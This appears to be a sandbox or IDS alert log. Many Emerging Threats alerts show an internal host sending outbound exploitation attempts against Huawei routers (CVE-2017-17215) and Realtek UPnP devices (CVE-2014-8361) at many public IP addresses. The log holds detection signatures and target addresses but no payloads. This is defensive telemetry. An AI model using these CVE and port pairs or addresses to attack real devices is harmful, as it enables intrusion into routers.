                                                07/20/24-23:05:45.988990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832637215192.168.2.14183.40.55.14
                                                07/20/24-23:05:39.654418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5302452869192.168.2.14154.217.235.162
                                                07/20/24-23:06:09.712957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4333452869192.168.2.1488.83.89.231
                                                07/20/24-23:06:11.695372TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5847052869192.168.2.14162.196.84.240
                                                07/20/24-23:07:15.422064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4264452869192.168.2.14117.10.8.160
                                                07/20/24-23:05:50.542034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693637215192.168.2.1441.7.54.25
                                                07/20/24-23:05:56.106041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570237215192.168.2.1496.165.35.132
                                                07/20/24-23:06:19.633139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4516252869192.168.2.14122.109.165.81
                                                07/20/24-23:06:01.824928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613523052869192.168.2.14172.216.136.43
                                                07/20/24-23:05:40.341196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24760052869192.168.2.1459.16.3.2
                                                07/20/24-23:05:34.625707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127637215192.168.2.14157.38.20.146
                                                07/20/24-23:05:36.323629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413037215192.168.2.14157.241.110.249
                                                07/20/24-23:05:42.135703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049637215192.168.2.142.201.243.3
                                                07/20/24-23:05:45.019762TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5222052869192.168.2.14223.70.59.173
                                                07/20/24-23:06:38.250934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3548852869192.168.2.1481.220.23.144
                                                07/20/24-23:05:45.359662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935037215192.168.2.1441.38.139.189
                                                07/20/24-23:05:37.440208TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3503852869192.168.2.14157.223.126.25
                                                07/20/24-23:06:02.517784TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25136052869192.168.2.14174.254.246.247
                                                07/20/24-23:05:37.450149TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3612052869192.168.2.14146.54.174.109
                                                07/20/24-23:05:44.501694TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25420452869192.168.2.1448.41.41.245
                                                07/20/24-23:05:40.467316TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25315852869192.168.2.1478.197.124.123
                                                07/20/24-23:05:57.445836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5899652869192.168.2.1467.226.93.72
                                                07/20/24-23:05:58.383835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5494852869192.168.2.14163.106.60.149
                                                07/20/24-23:06:04.290199TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4928452869192.168.2.1496.91.77.99
                                                07/20/24-23:07:19.727778TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614914652869192.168.2.14182.124.0.183
                                                07/20/24-23:05:52.493809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4940052869192.168.2.14223.116.88.128
                                                07/20/24-23:06:16.113185TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25037652869192.168.2.14198.64.2.133
                                                07/20/24-23:05:55.889998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489437215192.168.2.1441.146.180.252
                                                07/20/24-23:05:52.632555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3745652869192.168.2.14125.215.149.55
                                                07/20/24-23:05:37.440705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5021252869192.168.2.1451.192.83.103
                                                07/20/24-23:05:40.392392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4246452869192.168.2.14116.71.24.211
                                                07/20/24-23:05:40.455250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4882252869192.168.2.1471.233.122.57
                                                07/20/24-23:05:52.545166TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25117052869192.168.2.1436.229.223.206
                                                07/20/24-23:05:57.556240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4381052869192.168.2.1441.130.186.1
                                                07/20/24-23:06:07.283476TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615256052869192.168.2.14189.32.36.162
                                                07/20/24-23:06:08.410817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615707452869192.168.2.14206.252.90.242
                                                07/20/24-23:05:50.479091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4444037215192.168.2.14197.20.101.132
                                                07/20/24-23:06:15.366643TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25852252869192.168.2.14216.57.237.73
                                                07/20/24-23:05:47.103906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4587237215192.168.2.1436.141.95.11
                                                07/20/24-23:05:37.453720TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24413452869192.168.2.1441.32.9.125
                                                07/20/24-23:05:37.590968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569452869192.168.2.1412.94.49.225
                                                07/20/24-23:05:57.963204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4889652869192.168.2.14217.15.90.132
                                                07/20/24-23:05:52.554950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051652869192.168.2.1431.227.142.212
                                                07/20/24-23:06:01.234287TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5059252869192.168.2.149.150.51.97
                                                07/20/24-23:06:01.319175TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616031052869192.168.2.14155.136.119.1
                                                07/20/24-23:06:06.077998TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24761252869192.168.2.14145.133.233.116
                                                07/20/24-23:05:52.546679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5449252869192.168.2.1467.42.251.191
                                                07/20/24-23:08:36.040271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4398652869192.168.2.1472.128.25.96
                                                07/20/24-23:05:33.853184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414037215192.168.2.14157.25.209.247
                                                07/20/24-23:05:34.652423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031237215192.168.2.14197.160.70.240
                                                07/20/24-23:05:58.417625TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5232852869192.168.2.14169.95.16.220
                                                07/20/24-23:06:00.248123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3440852869192.168.2.14219.175.221.8
                                                07/20/24-23:05:42.127943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4086037215192.168.2.14197.1.83.86
                                                07/20/24-23:06:21.679115TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614011252869192.168.2.142.161.1.231
                                                07/20/24-23:05:45.460569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419037215192.168.2.14157.64.44.147
                                                07/20/24-23:06:01.256977TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25770452869192.168.2.14130.0.101.52
                                                07/20/24-23:06:01.603782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5939652869192.168.2.14143.21.232.22
                                                07/20/24-23:05:56.056582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388837215192.168.2.14146.146.12.149
                                                07/20/24-23:06:08.048662TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615503252869192.168.2.1498.26.18.228
                                                07/20/24-23:07:06.283235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4872452869192.168.2.1458.253.118.177
                                                07/20/24-23:05:59.106701TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615251652869192.168.2.14117.185.208.242
                                                07/20/24-23:05:56.771186TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3369452869192.168.2.14166.179.95.6
                                                07/20/24-23:05:57.566382TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25039452869192.168.2.14153.2.64.76
                                                07/20/24-23:05:58.981798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5527452869192.168.2.14202.237.8.144
                                                07/20/24-23:05:34.652423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654237215192.168.2.14197.81.135.223
                                                07/20/24-23:06:40.850874TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24786452869192.168.2.14132.28.34.172
                                                07/20/24-23:06:28.937691TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5750852869192.168.2.14111.198.109.202
                                                07/20/24-23:06:04.936056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25348052869192.168.2.14181.7.176.20
                                                07/20/24-23:05:52.525575TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4557452869192.168.2.14123.146.160.118
                                                07/20/24-23:06:01.256977TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25740452869192.168.2.144.35.177.241
                                                07/20/24-23:06:09.667246TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5725852869192.168.2.1458.16.41.243
                                                07/20/24-23:05:48.173904TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3706852869192.168.2.14212.158.194.40
                                                07/20/24-23:05:59.827265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3351252869192.168.2.14167.123.39.124
                                                07/20/24-23:06:50.419958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615006052869192.168.2.1491.205.183.206
                                                07/20/24-23:05:45.424850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432837215192.168.2.1441.205.214.141
                                                07/20/24-23:05:40.483611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4515252869192.168.2.14106.152.34.222
                                                07/20/24-23:06:12.617233TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25164452869192.168.2.14196.194.6.236
                                                07/20/24-23:05:34.653253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4126237215192.168.2.1441.124.78.80
                                                07/20/24-23:05:57.551205TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25537652869192.168.2.14160.37.99.47
                                                07/20/24-23:05:59.443719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5065052869192.168.2.14204.213.243.95
                                                07/20/24-23:05:46.287260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3316852869192.168.2.1427.61.113.9
                                                07/20/24-23:05:57.590266TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25641652869192.168.2.1465.123.169.88
                                                07/20/24-23:06:09.320815TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25602852869192.168.2.14203.215.159.116
                                                07/20/24-23:05:33.827209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729437215192.168.2.14186.23.77.122
                                                07/20/24-23:05:59.227912TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613857252869192.168.2.1412.176.0.4
                                                07/20/24-23:05:58.369729TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3404052869192.168.2.1470.214.171.113
                                                07/20/24-23:06:14.544693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4077852869192.168.2.1417.155.126.73
                                                07/20/24-23:05:52.603344TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25674252869192.168.2.14161.253.199.89
                                                07/20/24-23:06:24.472445TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614789852869192.168.2.1486.184.56.189
                                                07/20/24-23:06:02.863188TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25135652869192.168.2.14172.49.31.94
                                                07/20/24-23:05:39.685213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790037215192.168.2.1441.90.148.179
                                                07/20/24-23:05:52.485640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5798452869192.168.2.1420.184.51.228
                                                07/20/24-23:05:59.443720TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24512652869192.168.2.14191.158.120.67
                                                07/20/24-23:05:39.039093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386237215192.168.2.14197.45.71.107
                                                07/20/24-23:05:37.465013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5585452869192.168.2.14175.80.113.227
                                                07/20/24-23:06:11.280682TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5696852869192.168.2.14203.255.46.180
                                                07/20/24-23:05:34.659617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610037215192.168.2.14157.175.25.122
                                                07/20/24-23:06:01.978394TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6066452869192.168.2.14173.164.101.22
                                                07/20/24-23:05:59.454601TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23709252869192.168.2.1448.95.62.86
                                                07/20/24-23:05:37.442841TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24905052869192.168.2.1413.122.59.167
                                                07/20/24-23:05:57.702332TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3633452869192.168.2.1482.141.157.248
                                                07/20/24-23:05:58.382026TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3815052869192.168.2.1459.30.40.102
                                                07/20/24-23:06:35.414252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5363052869192.168.2.14186.187.42.215
                                                07/20/24-23:06:05.124334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4788452869192.168.2.1492.219.216.50
                                                07/20/24-23:06:04.676388TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614790052869192.168.2.14131.192.122.136
                                                07/20/24-23:05:56.137269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445237215192.168.2.14197.104.32.150
                                                07/20/24-23:05:59.257734TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25380052869192.168.2.1498.243.190.82
                                                07/20/24-23:06:14.536716TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613906852869192.168.2.142.90.110.47
                                                07/20/24-23:05:38.386265TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614482852869192.168.2.1491.111.129.197
                                                07/20/24-23:05:37.496382TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23988852869192.168.2.148.166.54.209
                                                07/20/24-23:05:58.107636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3744852869192.168.2.14174.28.203.137
                                                07/20/24-23:05:39.362477TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615702252869192.168.2.1443.253.131.181
                                                07/20/24-23:05:35.956352TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613315252869192.168.2.141.211.28.20
                                                07/20/24-23:05:48.748553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275637215192.168.2.1441.149.145.81
                                                07/20/24-23:05:42.245949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4941837215192.168.2.141.128.210.11
                                                07/20/24-23:05:52.493809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4437852869192.168.2.14202.54.99.106
                                                07/20/24-23:05:57.958012TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615402252869192.168.2.1417.240.156.181
                                                07/20/24-23:05:35.958789TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613453852869192.168.2.1448.191.112.200
                                                07/20/24-23:05:57.973674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5963252869192.168.2.1450.39.27.83
                                                07/20/24-23:05:38.951134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493037215192.168.2.14197.44.149.176
                                                07/20/24-23:05:48.202460TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613455852869192.168.2.1431.251.184.113
                                                07/20/24-23:05:34.627950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334637215192.168.2.14211.106.125.212
                                                07/20/24-23:05:37.575243TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24275252869192.168.2.142.163.63.233
                                                07/20/24-23:07:08.060226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613461652869192.168.2.1454.107.221.135
                                                07/20/24-23:05:36.325898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3684237215192.168.2.1441.96.155.17
                                                07/20/24-23:05:47.342078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4316652869192.168.2.14165.53.50.40
                                                07/20/24-23:06:16.692772TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615841852869192.168.2.1494.75.131.134
                                                07/20/24-23:07:32.121311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3390252869192.168.2.14212.164.237.193
                                                07/20/24-23:05:37.446803TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25843652869192.168.2.145.221.237.47
                                                07/20/24-23:05:57.477993TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3685452869192.168.2.14168.222.92.221
                                                07/20/24-23:05:58.929504TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25087852869192.168.2.14222.129.233.119
                                                07/20/24-23:06:03.367262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181437215192.168.2.14157.90.15.78
                                                07/20/24-23:05:59.471230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5126052869192.168.2.1493.60.39.218
                                                07/20/24-23:06:09.742007TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615613252869192.168.2.14167.138.240.239
                                                07/20/24-23:05:46.101747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963437215192.168.2.1441.4.146.206
                                                07/20/24-23:06:34.929510TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23479052869192.168.2.14223.138.154.84
                                                07/20/24-23:06:00.971446TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613918252869192.168.2.14171.66.243.60
                                                07/20/24-23:06:01.649917TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5111052869192.168.2.145.141.246.151
                                                07/20/24-23:05:57.804757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4358452869192.168.2.14222.129.187.194
                                                07/20/24-23:05:58.981798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614484652869192.168.2.14131.2.104.94
                                                07/20/24-23:05:33.830272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009437215192.168.2.14157.104.80.16
                                                07/20/24-23:05:45.575211TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615485252869192.168.2.1446.75.235.28
                                                07/20/24-23:07:15.422064TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25878652869192.168.2.14175.185.115.85
                                                07/20/24-23:05:42.257476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794237215192.168.2.1441.195.250.71
                                                07/20/24-23:05:56.022964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160837215192.168.2.1441.191.82.175
                                                07/20/24-23:06:02.902217TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614718852869192.168.2.14120.192.98.227
                                                07/20/24-23:05:39.124038TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3883852869192.168.2.14206.220.79.127
                                                07/20/24-23:05:52.475330TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25611452869192.168.2.1495.213.237.81
                                                07/20/24-23:05:33.853184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622837215192.168.2.14157.68.215.138
                                                07/20/24-23:05:59.449442TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4103652869192.168.2.1493.254.0.231
                                                07/20/24-23:06:01.255189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4774652869192.168.2.1417.60.150.214
                                                07/20/24-23:06:11.551203TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614952852869192.168.2.14140.234.68.221
                                                07/20/24-23:05:50.576749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079237215192.168.2.1441.83.93.4
                                                07/20/24-23:06:39.471724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6097252869192.168.2.1497.122.27.131
                                                07/20/24-23:06:01.173875TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3844452869192.168.2.1452.245.58.49
                                                07/20/24-23:06:33.181510TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615873852869192.168.2.14205.84.230.6
                                                07/20/24-23:05:56.048573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674837215192.168.2.14197.93.69.105
                                                07/20/24-23:05:36.255022TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615571852869192.168.2.14113.47.213.157
                                                07/20/24-23:06:01.319175TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24425052869192.168.2.1494.175.0.69
                                                07/20/24-23:05:35.342520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5099852869192.168.2.1436.216.251.126
                                                07/20/24-23:05:33.830570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092637215192.168.2.1418.5.132.170
                                                07/20/24-23:05:39.741053TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613527052869192.168.2.1450.231.248.171
                                                07/20/24-23:06:01.903875TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4149652869192.168.2.14145.253.39.34
                                                07/20/24-23:05:57.523834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25101652869192.168.2.1417.97.170.109
                                                07/20/24-23:05:33.857159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698037215192.168.2.14157.76.189.3
                                                07/20/24-23:05:35.204274TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4714452869192.168.2.1413.122.59.167
                                                07/20/24-23:05:45.057445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5591452869192.168.2.1463.16.203.38
                                                07/20/24-23:05:47.016775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056237215192.168.2.14197.18.49.179
                                                07/20/24-23:05:58.192346TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24329452869192.168.2.14105.53.110.200
                                                07/20/24-23:05:59.482880TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614250852869192.168.2.1488.73.51.55
                                                07/20/24-23:05:57.207276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5894252869192.168.2.14129.194.94.79
                                                07/20/24-23:06:16.347950TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25749852869192.168.2.142.211.159.113
                                                07/20/24-23:05:34.664378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700037215192.168.2.1441.88.139.101
                                                07/20/24-23:07:36.644546TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25739652869192.168.2.1463.220.62.243
                                                07/20/24-23:05:35.905406TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5411652869192.168.2.14180.106.180.212
                                                07/20/24-23:05:37.493635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5312252869192.168.2.1464.61.239.79
                                                07/20/24-23:06:12.350524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5602652869192.168.2.14199.163.241.170
